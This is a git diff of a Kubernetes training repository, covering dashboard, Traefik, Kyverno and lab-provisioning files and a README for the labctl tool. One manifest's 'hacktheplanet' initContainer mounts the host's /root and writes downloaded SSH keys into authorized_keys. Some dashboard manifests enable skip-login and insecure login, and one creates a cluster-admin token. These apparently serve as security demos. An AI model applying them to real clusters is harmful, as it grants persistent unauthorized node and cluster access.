Compare commits

..

1 Commits

Author SHA1 Message Date
Jérôme Petazzoni
ea3178327a Prepare content for Thoughtworks Infrastructure 2022-08-17 14:51:57 +02:00
383 changed files with 6899 additions and 15018 deletions

14
.gitignore vendored
View File

@@ -2,14 +2,11 @@
*.swp
*~
**/terraform.tfstate
**/terraform.tfstate.backup
prepare-labs/terraform/lab-environments
prepare-labs/terraform/many-kubernetes/one-kubernetes-config/config.tf
prepare-labs/terraform/many-kubernetes/one-kubernetes-module/*.tf
prepare-labs/terraform/tags
prepare-labs/terraform/virtual-machines/openstack/*.tfvars
prepare-labs/www
prepare-vms/tags
prepare-vms/infra
prepare-vms/www
prepare-tf/tag-*
slides/*.yml.html
slides/autopilot/state.yaml
@@ -29,4 +26,3 @@ node_modules
Thumbs.db
ehthumbs.db
ehthumbs_vista.db

View File

@@ -1,6 +1,6 @@
FROM ruby:alpine
RUN apk add --update build-base curl
RUN gem install sinatra --version '~> 3'
RUN gem install sinatra
RUN gem install thin
ADD hasher.rb /
CMD ["ruby", "hasher.rb"]

View File

@@ -17,8 +17,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
@@ -30,8 +30,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-certs
namespace: kubernetes-dashboard
type: Opaque
@@ -43,8 +43,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-csrf
namespace: kubernetes-dashboard
type: Opaque
@@ -56,8 +56,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-key-holder
namespace: kubernetes-dashboard
type: Opaque
@@ -71,8 +71,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-settings
namespace: kubernetes-dashboard
---
@@ -84,8 +84,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-metrics
rules:
- apiGroups:
@@ -106,8 +106,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-metrics
roleRef:
apiGroup: rbac.authorization.k8s.io
@@ -126,8 +126,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
rules:
@@ -182,8 +182,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
roleRef:
@@ -204,8 +204,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
kubernetes.io/cluster-service: "true"
name: kubernetes-dashboard
namespace: kubernetes-dashboard
@@ -229,8 +229,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
@@ -253,8 +253,8 @@ spec:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
spec:
containers:
- args:
@@ -262,7 +262,7 @@ spec:
- --sidecar-host=http://127.0.0.1:8000
- --enable-skip-login
- --enable-insecure-login
image: kubernetesui/dashboard:v2.7.0
image: kubernetesui/dashboard:v2.5.0
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
@@ -293,7 +293,7 @@ spec:
name: kubernetes-dashboard-certs
- mountPath: /tmp
name: tmp-volume
- image: kubernetesui/metrics-scraper:v1.0.8
- image: kubernetesui/metrics-scraper:v1.0.7
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:

View File

@@ -17,8 +17,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
@@ -30,8 +30,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-certs
namespace: kubernetes-dashboard
type: Opaque
@@ -43,8 +43,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-csrf
namespace: kubernetes-dashboard
type: Opaque
@@ -56,8 +56,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-key-holder
namespace: kubernetes-dashboard
type: Opaque
@@ -71,8 +71,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-settings
namespace: kubernetes-dashboard
---
@@ -84,8 +84,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-metrics
rules:
- apiGroups:
@@ -106,8 +106,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-metrics
roleRef:
apiGroup: rbac.authorization.k8s.io
@@ -126,8 +126,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
rules:
@@ -182,8 +182,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
roleRef:
@@ -204,8 +204,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
kubernetes.io/cluster-service: "true"
name: kubernetes-dashboard
namespace: kubernetes-dashboard
@@ -229,8 +229,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
@@ -253,15 +253,15 @@ spec:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
spec:
containers:
- args:
- --namespace=kubernetes-dashboard
- --auto-generate-certificates
- --sidecar-host=http://127.0.0.1:8000
image: kubernetesui/dashboard:v2.7.0
image: kubernetesui/dashboard:v2.5.0
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
@@ -292,7 +292,7 @@ spec:
name: kubernetes-dashboard-certs
- mountPath: /tmp
name: tmp-volume
- image: kubernetesui/metrics-scraper:v1.0.8
- image: kubernetesui/metrics-scraper:v1.0.7
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:

View File

@@ -17,8 +17,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
@@ -30,8 +30,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-certs
namespace: kubernetes-dashboard
type: Opaque
@@ -43,8 +43,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-csrf
namespace: kubernetes-dashboard
type: Opaque
@@ -56,8 +56,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-key-holder
namespace: kubernetes-dashboard
type: Opaque
@@ -71,8 +71,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-settings
namespace: kubernetes-dashboard
---
@@ -84,8 +84,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-metrics
rules:
- apiGroups:
@@ -106,8 +106,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard-metrics
roleRef:
apiGroup: rbac.authorization.k8s.io
@@ -126,8 +126,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
rules:
@@ -182,8 +182,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
roleRef:
@@ -204,8 +204,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
kubernetes.io/cluster-service: "true"
name: kubernetes-dashboard
namespace: kubernetes-dashboard
@@ -229,8 +229,8 @@ metadata:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
@@ -253,15 +253,15 @@ spec:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
app.kubernetes.io/version: 2.5.0
helm.sh/chart: kubernetes-dashboard-5.2.0
spec:
containers:
- args:
- --namespace=kubernetes-dashboard
- --auto-generate-certificates
- --sidecar-host=http://127.0.0.1:8000
image: kubernetesui/dashboard:v2.7.0
image: kubernetesui/dashboard:v2.5.0
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
@@ -292,7 +292,7 @@ spec:
name: kubernetes-dashboard-certs
- mountPath: /tmp
name: tmp-volume
- image: kubernetesui/metrics-scraper:v1.0.8
- image: kubernetesui/metrics-scraper:v1.0.7
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
@@ -344,12 +344,3 @@ metadata:
creationTimestamp: null
name: cluster-admin
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Secret
type: kubernetes.io/service-account-token
metadata:
name: cluster-admin-token
namespace: kubernetes-dashboard
annotations:
kubernetes.io/service-account.name: cluster-admin

View File

@@ -16,7 +16,8 @@ spec:
hostPath:
path: /root
tolerations:
- operator: Exists
- effect: NoSchedule
operator: Exists
initContainers:
- name: hacktheplanet
image: alpine
@@ -26,7 +27,7 @@ spec:
command:
- sh
- -c
- "mkdir -p /root/.ssh && apk update && apk add curl && curl https://github.com/jpetazzo.keys >> /root/.ssh/authorized_keys"
- "mkdir -p /root/.ssh && apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
containers:
- name: web
image: nginx

View File

@@ -1,5 +1,5 @@
kind: HorizontalPodAutoscaler
apiVersion: autoscaling/v2
apiVersion: autoscaling/v2beta2
metadata:
name: rng
spec:

View File

@@ -15,10 +15,10 @@ spec:
- key: "{{ request.operation }}"
operator: Equals
value: UPDATE
- key: "{{ request.oldObject.metadata.labels.color || '' }}"
- key: "{{ request.oldObject.metadata.labels.color }}"
operator: NotEquals
value: ""
- key: "{{ request.object.metadata.labels.color || '' }}"
- key: "{{ request.object.metadata.labels.color }}"
operator: NotEquals
value: ""
validate:

View File

@@ -15,10 +15,10 @@ spec:
- key: "{{ request.operation }}"
operator: Equals
value: UPDATE
- key: "{{ request.oldObject.metadata.labels.color || '' }}"
- key: "{{ request.oldObject.metadata.labels.color }}"
operator: NotEquals
value: ""
- key: "{{ request.object.metadata.labels.color || '' }}"
- key: "{{ request.object.metadata.labels.color }}"
operator: Equals
value: ""
validate:

View File

@@ -1,13 +0,0 @@
apiVersion: policy/v1
kind: PodDisruptionBudget
metadata:
name: my-pdb
spec:
#minAvailable: 2
#minAvailable: 90%
maxUnavailable: 1
#maxUnavailable: 10%
selector:
matchLabels:
app: my-app

View File

@@ -1,27 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: sysctl
spec:
selector:
matchLabels:
app: sysctl
template:
metadata:
labels:
app: sysctl
spec:
tolerations:
- operator: Exists
initContainers:
- name: sysctl
image: alpine
securityContext:
privileged: true
command:
- sysctl
- fs.inotify.max_user_instances=99999
containers:
- name: pause
image: registry.k8s.io/pause:3.8

View File

@@ -1,44 +1,36 @@
---
apiVersion: v1
kind: Namespace
metadata:
name: traefik
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: traefik
namespace: traefik
name: traefik-ingress-controller
namespace: kube-system
---
kind: DaemonSet
apiVersion: apps/v1
metadata:
name: traefik
namespace: traefik
name: traefik-ingress-controller
namespace: kube-system
labels:
app: traefik
k8s-app: traefik-ingress-lb
spec:
selector:
matchLabels:
app: traefik
k8s-app: traefik-ingress-lb
template:
metadata:
labels:
app: traefik
name: traefik
k8s-app: traefik-ingress-lb
name: traefik-ingress-lb
spec:
tolerations:
- effect: NoSchedule
operator: Exists
# If, for some reason, our CNI plugin doesn't support hostPort,
# we can enable hostNetwork instead. That should work everywhere
# but it doesn't provide the same isolation.
#hostNetwork: true
serviceAccountName: traefik
hostNetwork: true
serviceAccountName: traefik-ingress-controller
terminationGracePeriodSeconds: 60
containers:
- image: traefik:v2.10
name: traefik
- image: traefik:v2.5
name: traefik-ingress-lb
ports:
- name: http
containerPort: 80
@@ -69,7 +61,7 @@ spec:
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: traefik
name: traefik-ingress-controller
rules:
- apiGroups:
- ""
@@ -81,6 +73,14 @@ rules:
- get
- list
- watch
- apiGroups:
- extensions
resources:
- ingresses
verbs:
- get
- list
- watch
- apiGroups:
- networking.k8s.io
resources:
@@ -94,15 +94,15 @@ rules:
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: traefik
name: traefik-ingress-controller
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: traefik
name: traefik-ingress-controller
subjects:
- kind: ServiceAccount
name: traefik
namespace: traefik
name: traefik-ingress-controller
namespace: kube-system
---
kind: IngressClass
apiVersion: networking.k8s.io/v1

View File

@@ -70,15 +70,4 @@ add_namespace() {
kubectl create serviceaccount -n kubernetes-dashboard cluster-admin \
-o yaml --dry-run=client \
#
echo ---
cat <<EOF
apiVersion: v1
kind: Secret
type: kubernetes.io/service-account-token
metadata:
name: cluster-admin-token
namespace: kubernetes-dashboard
annotations:
kubernetes.io/service-account.name: cluster-admin
EOF
) > dashboard-with-token.yaml

View File

@@ -1,222 +0,0 @@
# Tools to create lab environments
This directory contains tools to create lab environments for Docker and Kubernetes courses and workshops.
It also contains Terraform configurations that can be used stand-alone to create simple Kubernetes clusters.
Assuming that you have installed all the necessary dependencies, and placed cloud provider access tokens in the right locations, you could do, for instance:
```bash
# For a Docker course with 50 students,
# create 50 VMs on Digital Ocean.
./labctl create --students 50 --settings settings/docker.env --provider digitalocean
# For a Kubernetes training with 20 students,
# create 20 clusters of 4 VMs each using kubeadm,
# on a private Openstack cluster.
./labctl create --students 20 --settings settings/kubernetes.env --provider openstack/enix
# For a Kubernetes workshop with 80 students,
# create 80 clusters with 2 VMs each,
# using Scaleway Kapsule (managed Kubernetes).
./labctl create --students 20 --settings settings/mk8s.env --provider scaleway --mode mk8s
```
Interested? Read on!
## Software requirements
For Docker labs and Kubernetes labs based on kubeadm:
- [Parallel SSH](https://github.com/lilydjwg/pssh)
(should be installable with `pip install git+https://github.com/lilydjwg/pssh`;
on a Mac, try `brew install pssh`)
For all labs:
- Terraform
If you want to generate printable cards:
- [pyyaml](https://pypi.python.org/pypi/PyYAML)
- [jinja2](https://pypi.python.org/pypi/Jinja2)
These require Python 3. If you are on a Mac, see below for specific instructions on setting up
Python 3 to be the default Python on a Mac. In particular, if you installed `mosh`, Homebrew
may have changed your default Python to Python 2.
You will also need an account with the cloud provider(s) that you want to use to deploy the lab environments.
## Cloud provider account(s) and credentials
These scripts create VMs or Kubernetes cluster on cloud providers, so you will need cloud provider account(s) and credentials.
Generally, we try to use the credentials stored in the configuration file used by the cloud providers CLI tools.
This means, for instance, that for Linode, if you install `linode-cli` and configure it properly, it will place your credentials in `~/.config/linode-cli`, and our Terraform configurations will try to read that file and use the credentials in it.
You don't **have to** install the CLI tools of the cloud provider(s) that you want to use; but we recommend that you do.
If you want to provide your cloud credentials through other means, you will have to adjust the Terraform configuration files in `terraform/provider-config` accordingly.
Here is where we look for credentials for each provider:
- AWS: Terraform defaults; see [AWS provider documentation][creds-aws] (for instance, you can use the `AWS_ACCESS_KEY_ID` and `AWS_SECRET_ACCESS_KEY` environment variables, or AWS config and profile files)
- Azure: Terraform defaults; see [AzureRM provider documentation][creds-azure] (typically, you can authenticate with the `az` CLI and Terraform will pick it up automatically)
- Civo: CLI configuration file (`~/.civo.json`)
- Digital Ocean: CLI configuration file (`~/.config/doctl/config.yaml`)
- Exoscale: CLI configuration file (`~/.config/exoscale/exoscale.toml`)
- Google Cloud: FIXME, note that the project name is currently hard-coded to `prepare-tf`
- Hetzner: CLI configuration file (`~/.config/hcloud/cli.toml`)
- Linode: CLI configuration file (`~/.config/linode-cli`)
- OpenStack: you will need to write a tfvars file (check [that exemple](terraform/virtual-machines/openstack/tfvars.example))
- Oracle: Terraform defaults; see [OCI provider documentation][creds-oci] (for instance, you can set up API keys; or you can use a short-lived token generated by the OCI CLI with `oci session authenticate`)
- OVH: Terraform defaults; see [OVH provider documentation][creds-ovh] (this typically involves setting up 5 `OVH_...` environment variables)
- Scaleway: Terraform defaults; see [Scaleway provider documentation][creds-scw] (for instance, you can set environment variables, but it will also automatically pick up CLI authentication from `~/.config/scw/config.yaml`)
[creds-aws]: https://registry.terraform.io/providers/hashicorp/aws/latest/docs#authentication-and-configuration
[creds-azure]: https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs#authenticating-to-azure
[creds-oci]: https://docs.oracle.com/en-us/iaas/Content/API/SDKDocs/terraformproviderconfiguration.htm#authentication
[creds-ovh]: https://registry.terraform.io/providers/ovh/ovh/latest/docs#provider-configuration
[creds-scw]: https://registry.terraform.io/providers/scaleway/scaleway/latest/docs#authentication
## General Workflow
- fork/clone repo
- make sure your cloud credentials have been configured properly
- run `./labctl create ...` to create lab environments
- run `./labctl destroy ...` when you don't need the environments anymore
## Customizing things
You can edit the `settings/*.env` files, for instance to change the size of the clusters, the login or password used for the students...
Note that these files are sourced before executing any operation on a specific set of lab environments, which means that you can set Terraform variables by adding lines like the following one in the `*.env` files:
```bash
export TF_VAR_node_size=GP1.L
export TF_VAR_location=eu-north
```
## `./labctl` Usage
If you run `./labctl` without arguments, it will show a list of available commands.
### Summary of What `./labctl` Does For You
The script will create a Terraform configuration using a provider-specific template.
There are two modes: `pssh` and `mk8s`.
In `pssh` mode, students connect directly to the virtual machines using SSH.
The Terraform configuration creates a bunch of virtual machines, then the provisioning and configuration are done with `pssh`. There are a number of "steps" that are executed on the VMs, to install Docker, install a number of convenient tools, install and set up Kubernetes (if needed)... The list of "steps" to be executed is configured in the `settings/*.env` file.
In `mk8s` mode, students don't connect directly to the virtual machines. Instead, they connect to an SSH server running in a Pod (using the `jpetazzo/shpod` image), itself running on a Kubernetes cluster. The Kubernetes cluster is a managed cluster created by the Terraform configuration.
## `terraform` directory structure and principles
Legend:
- `📁` directory
- `📄` file
- `📄📄📄` multiple files
- `🌍` Terraform configuration that can be used "as-is"
```
📁terraform
├── 📁list-locations
│ └── 📄📄📄 helper scripts
│ (to list available locations for each provider)
├── 📁many-kubernetes
│ └── 📄📄📄 Terraform configuration template
│ (used in mk8s mode)
├── 📁one-kubernetes
│ │ (contains Terraform configurations that can spawn
│ │ a single Kubernetes cluster on a given provider)
│ ├── 📁🌍aws
│ ├── 📁🌍civo
│ ├── 📄common.tf
│ ├── 📁🌍digitalocean
│ └── ...
├── 📁providers
│ ├── 📁aws
│ │ ├── 📄config.tf
│ │ └── 📄variables.tf
│ ├── 📁azure
│ │ ├── 📄config.tf
│ │ └── 📄variables.tf
│ ├── 📁civo
│ │ ├── 📄config.tf
│ │ └── 📄variables.tf
│ ├── 📁digitalocean
│ │ ├── 📄config.tf
│ │ └── 📄variables.tf
│ └── ...
├── 📁tags
│ │ (contains Terraform configurations + other files
│ │ for a specific set of VMs or K8S clusters; these
│ │ are created by labctl)
│ ├── 📁2023-03-27-10-04-79-jp
│ ├── 📁2023-03-27-10-07-41-jp
│ ├── 📁2023-03-27-10-16-418-jp
│ └── ...
└── 📁virtual-machines
│ (contains Terraform configurations that can spawn
│ a bunch of virtual machines on a given provider)
├── 📁🌍aws
├── 📁🌍azure
├── 📄common.tf
├── 📁🌍digitalocean
└── ...
```
The directory structure can feel a bit overwhelming at first, but it's built with specific goals in mind.
**Consistent input/output between providers.** The per-provider configurations in `one-kubernetes` all take the same input variables, and provide the same output variables. Same thing for the per-provider configurations in `virtual-machines`.
**Don't repeat yourself.** As much as possible, common variables, definitions, and logic has been factored in the `common.tf` file that you can see in `one-kubernetes` and `virtual-machines`. That file is then symlinked in each provider-specific directory, to make sure that all providers use the same version of the `common.tf` file.
**Don't repeat yourself (again).** The things that are specific to each provider have been placed in the `providers` directory, and are shared between the `one-kubernetes` and the `virtual-machines` configurations. Specifically, for each provider, there is `config.tf` (which contains provider configuration, e.g. how to obtain the credentials for that provider) and `variables.tf` (which contains default values like which location and which VM size to use).
**Terraform configurations should work in `labctl` or standalone, without extra work.** The Terraform configurations (identified by 🌍 in the directory tree above) can be used directly. Just go to one of these directories, `terraform init`, `terraform apply`, and you're good to go. But they can also be used from `labctl`. `labctl` shouldn't barf out if you did a `terraform apply` in one of these directories (because it will only copy the `*.tf` files, and leave alone the other files, like the Terraform state).
The latter means that it should be easy to tweak these configurations, or create a new one, without having to use `labctl` to test it. It also means that if you want to use these configurations but don't care about `labctl`, you absolutely can!
## Miscellaneous info
### Making sure Python3 is the default (Mac only)
Check the `/usr/local/bin/python` symlink. It should be pointing to
